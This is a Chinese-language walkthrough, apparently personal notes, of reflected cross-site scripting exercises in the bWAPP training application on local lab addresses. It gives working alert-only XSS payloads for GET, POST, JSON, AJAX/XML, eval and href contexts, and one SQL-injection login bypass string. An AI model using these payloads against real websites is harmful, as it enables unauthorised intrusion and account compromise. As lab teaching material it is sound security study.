A3 - Cross-Site Scripting (XSS)
*****************跨站脚本******************
跨站的终极思路:输入的东西在页面有回显
3.1-XSS – Reflected (GET)
在用户名输入:密码随便输入
<script>alert(/xss/)</script>
出现一次XSS
在用户名和密码出都输入:
<script>alert(/xss/)</script>
出现两个XSS
3.2-XSS - Reflected (POST)
在用户名输入:密码随便输入
<script>alert(/xss/)</script>
出现一次XSS
在用户名和密码出都输入:
<script>alert(/xss/)</script>
出现两个XSS
3.3-XSS - Reflected (JSON)
漏洞URL:
http://192.168.0.155/bWAPP/xss_json.php?title=';alert(1)//&action=search
3.4-XSS - Reflected (AJAX/JSON)
使用burp抓包,
http://172.16.0.225/bWAPP/xss_ajax_2-2.php?title=<script>alert(1)</script>
3.5-XSS - Reflected (AJAX/XML)
http://172.16.0.225/bWAPP/xss_ajax_1-2.php?title=/bWAPP/xss_ajax_1-2.php?title=<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>
xmlns是XML Namespaces的缩写
当加载网站的时候执行alert(1)
3.6-XSS - Reflected (Back Button)
本身没有XSS,但是在Referer字段中有
漏洞URL:http://192.168.0.155/bWAPP/xss_back_button.php
点击GO back之后会有
-3.7-XSS - Reflected (Custom Header)
这个实在是没找到跨站点在哪里,找的我尴尬症都犯了,全程抓包没发现,可疑点在这个位置,有玩出来的老铁麻烦留言一下,谢谢
3.8-XSS - Reflected (Eval)
http://172.16.0.225/bWAPP/xss_eval.php?date=alert(1)
直接在evla函数里面,可以直接alert
3.9-XSS - Reflected (HREF)
漏洞URL:
http://172.16.0.225/bWAPP/xss_href-2.php?name=/><script>alert(1)</script>&action=vote
前面的a标签要闭合掉
-3.10-XSS - Reflected (Login Form)
这个没玩出来
补充:这边有个万能密码,但是好像跟XSS没啥关系啊,这个怎么玩很尴尬
' or '1'='1